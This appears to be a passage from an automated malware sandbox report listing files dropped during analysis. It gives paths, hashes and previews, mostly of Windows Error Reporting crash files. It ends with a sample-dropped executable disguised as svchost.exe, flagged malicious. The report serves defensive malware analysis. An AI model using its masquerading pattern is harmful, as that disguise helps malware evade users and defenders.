                                                                                          SHA-512:D42DD5F6AE896C7FE5DBE79F06A33298F8641F0C8BFF513B991606B783E7A6C3AD5387BBA7542181489CC42883E6A8C0FC14C0AA1B019CDCEFDAF7C04C127F23
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5718.tmp.txt
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):13340
                                                                                          Entropy (8bit):2.6953083660809516
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:9GiZYWUgHKBmYOY1WhIHIYEZhztri9qwKIwCqmEaYduAT3qIMe3:9jZDnJJfDaYduATNMe3
                                                                                          MD5:681DF540AAF8567C3F9F5EF22DBF6E70
                                                                                          SHA1:46F3DE515C5F5A0B110240439B6D8C698B30286E
                                                                                          SHA-256:030C4185AEF6020E2C373F1ACB0358EE2DAB4D777862F5C55459C5110DF99C3A
                                                                                          SHA-512:DB5CC317E1AB2AEF2DE8B66D05A98DE2A519092A3818F16E85A8FEFDD45A7D98DD44C1264CD2683B716290E2CC5E96271222F292F540ED9C3DAC51A075D9409E
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER62AE.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Sep 28 03:28:27 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):326038
                                                                                          Entropy (8bit):3.7388052041137105
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:Vf03Yxjd+pip8QhFKKO9gIOgF5MF0LUCgU4p+IX5ebOoh5hjevBT:x03Y2pyO9RpDwyTjodIm
                                                                                          MD5:1E82612B9B7EB5AC2C7EDF83AC653433
                                                                                          SHA1:F2DC2E31B879A3349ECB0A6E62FB27524B23CE49
                                                                                          SHA-256:E93DCE9CC983874CB7EDE7563CAE6411ABE60CC570047EFB3D456B9DA85ABEF0
                                                                                          SHA-512:889F0A797596C6893C2689209F923F7D6E120719476D0C9297D9AC22796C4B390C5509084DA7DE8BA2C1288D3D306E9A337A3ED5B7F26512CD3A5120C8F70503
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: MDMP....... ........Ra...................U...........B.......0......GenuineIntelW...........T.......H.....Ra.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C44.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8398
                                                                                          Entropy (8bit):3.6940394070440203
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNi806H6YIcSUx8d4gmfZBSnCprRH89bTAsf2Rm:RrlsNiX6H6YTSUx8d4gmfPSsYTTfB
                                                                                          MD5:BBD313013A9716A15F55C3413D2A2BA1
                                                                                          SHA1:EFB8B458167A8D6D8332D04D0FEDD3D31D4B6D2F
                                                                                          SHA-256:3FF6CE3D12B3FD308F53610311759E5E1F541846EC638B919F8458FE3822BAF9
                                                                                          SHA-512:263FCAF31C18B9698857C328552395A757CC6F455DC997D16737CB19A123824261361DD95EFDD19E617A5FA566C2C29DE1F30DFDF5190D2F41C3483BE62F7113
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.8.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E0A.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4676
                                                                                          Entropy (8bit):4.446269990754614
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zsJJgtWI9p1WSC8Br8fm8M4JCulhLC2O7Fxwj+q8v5lhLC2Oe0/rA4itd:uITfb+ESNGJCum2QoK5m2yzA4itd
                                                                                          MD5:54CAA8222A238C5915C1F138701693D9
                                                                                          SHA1:CC89B59478E924F77C659A803DBC5BA16F06BAFD
                                                                                          SHA-256:5435069FF77B6FEDE87AEBBB91F730F837DA870B039704856C073EC9917B1A16
                                                                                          SHA-512:803685FBA3BD3B319549D93F0A9D0535CD4D29500C6FCE723CEDB8759F669C605A681915CEA2231A2CD8F32C1D0B177EB523320AFB0B791E2D3C53E50D454373
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1185879" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E1C.tmp.csv
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):55028
                                                                                          Entropy (8bit):3.0579116783390816
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:/mH/NkFtpjdsNo1rgZTwzHI3G1iZUbtOWbDi:/mH/NkFtpjdsNo1rgZTwzHqG1iZUbtOd
                                                                                          MD5:91EC262D630C5A92F0093FC35A122F1F
                                                                                          SHA1:0DBF6AE50ADFDEF9EC8C4ADEC79DC5B37AFF272D
                                                                                          SHA-256:0B9D9032280F23D67438CAF24AE527D51C1A92D1C71F39DB1D1B5F9246535618
                                                                                          SHA-512:EEC2AF3FF1D340AFD43F6334A3771F6CF148570834D861167F38004C025F30BFD3254E95C23759407B74C1562594CEC55F8D49139994F86E6437EE674AAED40E
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER73D9.tmp.txt
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):13340
                                                                                          Entropy (8bit):2.695834883124124
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:9GiZYWDc+zOzYsYdWrGHMYEZiDtrisqSKowJ63QcQaIDoDh3VIAb3:9jZDG7WnZQaIDoDhaAb3
                                                                                          MD5:1CD3C129C6E0DCBB36DF62B4F79041FE
                                                                                          SHA1:8702D9F23EAB2F332978CC5256208A6660493AEF
                                                                                          SHA-256:AD377E2D403955210A20FD38C49F5E556F3106C2745899FD66B4565BF9F9C87C
                                                                                          SHA-512:43FF0454E80D68EA70420D3E0B842B65C2C0741F3A64E1C59D94EA3D4A5015191CC99D2710B1BC0FC9C17318957681C4E5A94595A657FD28D0365EFEDEDBE256
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEBB.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Sep 28 03:27:52 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):333098
                                                                                          Entropy (8bit):3.6689649685110144
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:EQ0vjd+p/upWbmkQ9gIOgF5zCPs0xUCgUAgTpSsVb8p4oPu9lUdE:90opZQ9RpDzYsGTjvFNWK
                                                                                          MD5:90F5C57A37027C696F4121EF3E7029AB
                                                                                          SHA1:00901F99DD525FC26E96428F6A686BC3DE0CD465
                                                                                          SHA-256:AD1BCAEF443B170E1E5674290809EACECD137230D168C41C6754F003A56C776B
                                                                                          SHA-512:065AED34CD30D4BE884751353BCCB014F66B0382E663C3D306D99C601F32D668A87B6B9BDCA9EC06F7323FDC0EBD513455AC1B91532B1BA3B4031DC7DC96251A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: MDMP....... .........Ra...................U...........B......`1......GenuineIntelW...........T.............Ra.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE958.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8420
                                                                                          Entropy (8bit):3.696287469237415
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNilG6tF6YINSUs8pNgmfZGSnCprRg89boD6sf0gubm:RrlsNiU6P6YCSUs8pNgmfkSsdoDZfsS
                                                                                          MD5:024AC9C0F4E45272DE73EF324C3C66A8
                                                                                          SHA1:17B906E2D18610B77DA08E8DCCA302906FF00241
                                                                                          SHA-256:F1531107F2E3A83F55FA14EF04C416DEC76775C3CC1EA9E81713D6466E47EA8A
                                                                                          SHA-512:3CCC4559887CB762FC3F3779BABC6B8E9BBE1108FF77D343AB3F1F82C2E082B7F5E446C5708AE3E437C37DA96CDC57F7CA62E1FEB5A5F81F355D09F44541C924
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.7.6.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA82.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4701
                                                                                          Entropy (8bit):4.478127858890355
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zsItJgtWI9p1WSC8BD8fm8M4JnlhLFF0i+q8v3lhLOv/rA4Cid:uITfIH+ESNWJnAiK3qvzA4Cid
                                                                                          MD5:58A0BEEE5DD30D31C28988363AF1BB1A
                                                                                          SHA1:3BD8795429391CA41EDD7DC8C05C3672F7BA7CA5
                                                                                          SHA-256:D379F8E75357DDACE13A5C0224B69834A1AA915A35114AEEDE5F3554909724D2
                                                                                          SHA-512:04C51076499DF00B3C33D26E13597DA504949193EC56D359FBE49354C5F294509944837682EE6115E6F1E7B4B719B28663663CD295563C64CCCB7ABA1FF9DD6C
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1185878" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAAF.tmp.csv
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):57272
                                                                                          Entropy (8bit):3.0541917490009363
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:BzHcBnpDbtMWQ/5RtHZw1bgQynVDi/22LF3Kv:BzHcBnpDbtMWQ/5RtHZw1blynVDi/22S
                                                                                          MD5:FEAEDA01FE647E53A9FC80773EDB6061
                                                                                          SHA1:23D4D06526729AB789803ECD21C1A312FEEFB7C5
                                                                                          SHA-256:EF453A6CF02559DAFE6FBA21197E6BF4D8E33AA9F3E5B31B59C150F83C068BBA
                                                                                          SHA-512:4706FA06EC93D0C20F70B2E4C09F363B2C2D06E8FCED5C79496D5BB9D6A2CBB473A7C4B14131BCFFFE2B9800ED7E4E6419DEEFC5FF950AC70973939B9A414089
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2DE.tmp.txt
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):13340
                                                                                          Entropy (8bit):2.695253303502621
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:9GiZYWut6fJYdYrWKW0HLYEZretFi+qeK0wXTjbaLUzqQo3IIFg3:9jZDHKKLnaLUeQofFg3
                                                                                          MD5:8F0988CCFA5DDA1B37DB36206FAA8D7E
                                                                                          SHA1:E6C7A2A0E90FA76AFB7C7DADAAF9FDAFC6A57922
                                                                                          SHA-256:AB99938D88584D089F9AA1AA84891A252F109D4117A6FD13AE46494CD097CF06
                                                                                          SHA-512:5131DBD3237493479539C61665973B14C84A107198AC1E19C134CF05F00B591E03321F21EA1BC3E6E8E9C4116F1ED440B4A02A5ADB1CA28068C42CE577E1E8CD
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                          C:\Users\Public\Documents\???????????????\svchost.exe
                                                                                          Process:C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):31232
                                                                                          Entropy (8bit):6.328607170068044
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:X1S7dO4lGn8pAw5sY0EIWCqgFDlZ8Lq7d:X1YbEnDwOEnCqMZF7d
                                                                                          MD5:B462382CB954466386F9334247E0A34C
                                                                                          SHA1:0AC9E261EAFC36F2D8A7BDA5755B44C9D8C883E9
                                                                                          SHA-256:6A19A144807268D406C6DA55513AE24493B2D411BA8E2A2E15567D66E55D976B
                                                                                          SHA-512:EDF4EC1938FF467207C75E38B2BBEA2445FEC6ACCDCD325101A4E4B60E17C9041B3C9795CF100D194549372C60B07E143464181C63458FC8E753F384B2369F4A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                          • Antivirus: ReversingLabs, Detection: 36%
                                                                                          Reputation:unknown
